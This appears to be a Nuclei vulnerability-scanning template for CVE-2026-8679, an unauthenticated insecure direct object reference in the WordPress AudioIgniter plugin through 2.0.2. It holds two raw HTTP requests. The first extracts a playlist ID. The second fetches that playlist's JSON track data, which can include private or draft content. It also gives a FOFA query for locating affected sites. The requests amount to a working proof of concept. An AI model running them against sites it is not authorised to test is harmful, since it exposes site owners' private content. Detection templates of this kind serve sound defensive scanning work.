id: CVE-2026-8679 info: name: WordPress AudioIgniter <= 2.0.2 - Unauthenticated IDOR author: 0x_Akoko severity: high description: | The AudioIgniter plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions up to, and including, 2.0.2. The handle_playlist_endpoint() function accepted a user-controlled playlist ID and returned track data without authentication. impact: | Unauthenticated attackers can access sensitive playlist metadata including private and draft content, leading to information disclosure. remediation: | Update to the latest version of AudioIgniter plugin. reference: - https://plugins.trac.wordpress.org/browser/audioigniter/trunk/audioigniter.php - https://nvd.nist.gov/vuln/detail/CVE-2026-8679 - https://wordpress.org/plugins/audioigniter/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2026-8679 epss-score: 0.27684 epss-percentile: 0.96536 cwe-id: CWE-639 metadata: verified: true max-request: 2 fofa-query: body="audioigniter_playlist_id" tags: cve,cve2026,wordpress,wp-plugin,audioigniter,idor,exposure,wp flow: http(1) && http(2) http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(body, "audioigniter_playlist_id")' condition: and internal: true extractors: - type: regex name: playlist_id part: body regex: - 'audioigniter_playlist_id=(\d+)' group: 1 internal: true - raw: - | GET /?audioigniter_playlist_id={{playlist_id}} HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(content_type, "application/json")' - 'contains_all(body, "\"title\"", "\"audio\"", "\"subtitle\"")' condition: and # digest: 4a0a004730450220592a6092289920960149d5d9c3e4e4a1bd6918f31f5e6dc9c79a406ccd906b35022100a4c20540d574ae8f50f50755f46c883db7535dec41add0a250a58949f48ca57b:922c64590222798bb761d5b6d8e72950